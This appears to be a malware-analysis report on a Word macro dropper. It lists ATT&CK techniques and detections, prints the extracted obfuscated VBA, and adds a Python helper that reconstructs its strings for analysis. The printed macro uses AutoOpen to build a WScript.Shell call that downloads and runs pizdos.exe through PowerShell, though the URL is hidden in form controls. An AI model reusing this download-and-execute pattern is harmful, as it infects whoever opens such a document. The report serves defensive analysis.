Verdict: MALICIOUS
Risk score: 180
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1105 Ingress Tool Transfer
The sample carries VBA macros, including an AutoOpen procedure, the classic initial-execution hook: Word runs it as soon as the document is opened with macros enabled. AutoOpen calls pPjsJp, which builds a ProgID from the literals "W" and "scrip" plus a value read from a UserForm control (ofjdt.TextBox1) and instantiates it with CreateObject; the control's contents are not in the extracted source, but the visible prefix is consistent with WScript.Shell. The object's .Run method is then handed a command line assembled in OJej from string fragments and further form-control reads: an interpreter prefix followed by /c, a PowerShell expression that instantiates System.Net.WebClient, a .DownloadFile call fetching an HTTP URL into an environment-variable path (the report resolves it as %TEMP%) under the name pizdos.exe, and a Start-Process on that file. The interpreter name, the URL and the environment-variable name are all read from form controls and cannot be recovered from the macro text alone, so the exact command line should be confirmed by dumping the UserForm control values (olevba can list these as form strings) or by detonating the document. The ClamAV detection Doc.Dropper.Agent-6329123-0 is consistent with this download-and-execute dropper behaviour.
Heuristics (5)
- ClamAV: Doc.Dropper.Agent-6329123-0 | critical | CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6329123-0
- VBA macros detected | medium | 2 related findings | OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro | high | OLE_VBA_AUTOOPEN: AutoOpen macro
- CreateObject call | high | OLE_VBA_CREATEOBJ: CreateObject call
- Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this generic description does not fully fit this sample: a VBA project was recovered (see Extracted artifacts below), so here the marker is corroborating evidence of the auto-execution surface rather than the only finding.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2000 bytes | 505dd10e866bd2f2e012914852af30ce90bc18cd1bfb6d528a21bbdb7b7a8869 |
Preview script (first 1,000 lines of the extracted script)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Call pPjsJp
End Sub
Attribute VB_Name = "jhdf"
Function pPjsJp()
ffRT = ofjdt.TextBox1
LdKr = "scrip"
jfJerjJ = LdKr + ffRT
Set JOdjr = CreateObject("W" + jfJerjJ)
JOdjr.Run OJej, 0
End Function
Attribute VB_Name = "fjty"
Attribute VB_Base = "0{D67A564D-76B8-427E-AB75-04D18217085D}{010A7AB5-C01D-4E18-B447-1F5944F8A8CB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Attribute VB_Name = "zxfjy"
Attribute VB_Base = "0{FD203EAD-27D6-4FDA-8AAB-597E189B9423}{874FE3A8-74AA-4CE7-AFD3-2D4FAB6EA8EC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Attribute VB_Name = "KHdryy"
Function OJej()
fhgrtt = "(" + zxfjy.yuthhf + zxfjy.vbcffg + "System.Net.WebClient)"
bxcvjs = ".Dow" + ofjdt.ogfhj + "ile"
JIjer = "('ht" + fjty.fgjt + "hp','%" + ofjdt.ytu + "%\pizdos.exe');"
vcber = "Start-" + "Process '%" + ofjdt.ytu + "%\pizdos.exe';"
OJej = ofjdt.rty + " /c " + zxfjy.tyre + zxfjy.ytef + zxfjy.nmgf + "" + fhgrtt + bxcvjs + JIjer + vcber + ""
End Function
Attribute VB_Name = "ofjdt"
Attribute VB_Base = "0{6605AA02-BD65-424E-BC7B-F6F0701295F2}{B817CDFE-BA49-453B-8848-623034F79131}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
```
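To make the string building in the preview tractable, here is an added Python helper. It is not part of the report, of the sample, or of oletools; it statically replays the "+" concatenations, substituting locals that the macro itself defines and leaving every read of a UserForm control (ofjdt.*, zxfjy.*, fjty.*) as a <placeholder>, because those values are stored in the form, not in the extracted macro text. The VBA excerpt embedded in it is copied from the preview above and trimmed to the string-building lines; the regexes only handle this straight-line pattern (no If/For, Chr(), Replace() or StrReverse tricks), which is all this sample uses.

```python
import re

# Constructed input: the string-building lines of the macro shown in the report's
# macros.bas preview. The form-control reads (ofjdt.*, zxfjy.*, fjty.*) are not in
# the extracted source, so they cannot be resolved here and stay as placeholders.
VBA_SOURCE = r'''
Function pPjsJp()
ffRT = ofjdt.TextBox1
LdKr = "scrip"
jfJerjJ = LdKr + ffRT
Set JOdjr = CreateObject("W" + jfJerjJ)
JOdjr.Run OJej, 0
End Function
Function OJej()
fhgrtt = "(" + zxfjy.yuthhf + zxfjy.vbcffg + "System.Net.WebClient)"
bxcvjs = ".Dow" + ofjdt.ogfhj + "ile"
JIjer = "('ht" + fjty.fgjt + "hp','%" + ofjdt.ytu + "%\pizdos.exe');"
vcber = "Start-" + "Process '%" + ofjdt.ytu + "%\pizdos.exe';"
OJej = ofjdt.rty + " /c " + zxfjy.tyre + zxfjy.ytef + zxfjy.nmgf + "" + fhgrtt + bxcvjs + JIjer + vcber + ""
End Function
'''

# A VBA line of the form   name = expr   or   Set name = expr
ASSIGN = re.compile(r'^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
# obj.Run arg, windowstyle   (the WScript.Shell-style invocation seen in pPjsJp)
RUN = re.compile(r'^\s*([A-Za-z_]\w*)\.Run\s+([A-Za-z_]\w*)')
# CreateObject(<progid expression>)
CREATE = re.compile(r'^CreateObject\((.*)\)$')
# Tokens of a '+' concatenation: a double-quoted literal or a (possibly dotted) identifier
TOKEN = re.compile(r'"([^"]*)"|([A-Za-z_][\w.]*)')
PLACEHOLDER = re.compile(r'<([\w.]+)>')


def evaluate(expr, env):
    """Concatenate a VBA '+' expression. Locals known from `env` are substituted;
    any other identifier (a form-control read such as ofjdt.ytu) becomes <ident>."""
    out = []
    for literal, ident in TOKEN.findall(expr):
        out.append(env.get(ident, f"<{ident}>") if ident else literal)
    return "".join(out)


def reconstruct(source):
    """Statically replay the straight-line string building in `source`.
    Returns the CreateObject ProgID, the command handed to .Run, and the sorted
    list of identifiers that cannot be resolved from the macro text alone."""
    env, objects, runs = {}, {}, []
    for line in source.splitlines():
        m = RUN.match(line)
        if m:
            runs.append((m.group(1), m.group(2)))  # resolved after all assignments
            continue
        m = ASSIGN.match(line)
        if not m:
            continue                               # Function / End Function / etc.
        name, expr = m.groups()
        c = CREATE.match(expr)
        if c:
            objects[name] = evaluate(c.group(1), env)
        else:
            # In VBA a Function's own name holds its return value, so "OJej = ..."
            # lands in env just like a local and is what .Run later receives.
            env[name] = evaluate(expr, env)
    result = {"progid": None, "run_command": None, "unresolved": set()}
    for obj, arg in runs:
        result["progid"] = objects.get(obj)
        result["run_command"] = env.get(arg, f"<{arg}>")
    for text in (result["progid"] or "", result["run_command"] or ""):
        result["unresolved"].update(PLACEHOLDER.findall(text))
    result["unresolved"] = sorted(result["unresolved"])
    return result


if __name__ == "__main__":
    r = reconstruct(VBA_SOURCE)
    print("CreateObject ProgID   :", r["progid"])
    print("Command passed to .Run:", r["run_command"])
    print("Unresolved form reads :", ", ".join(r["unresolved"]))
```

Running it yields the ProgID `Wscrip<ofjdt.TextBox1>` and a command template of the shape `<ofjdt.rty> /c <...>(<...>System.Net.WebClient).Dow<ofjdt.ogfhj>ile('ht<fjty.fgjt>hp','%<ofjdt.ytu>%\pizdos.exe');Start-Process '%<ofjdt.ytu>%\pizdos.exe';`, with ten distinct form-control reads still open. That list is exactly what to pull from the UserForm storage next; everything else about the download-and-execute chain is already fixed by the macro text.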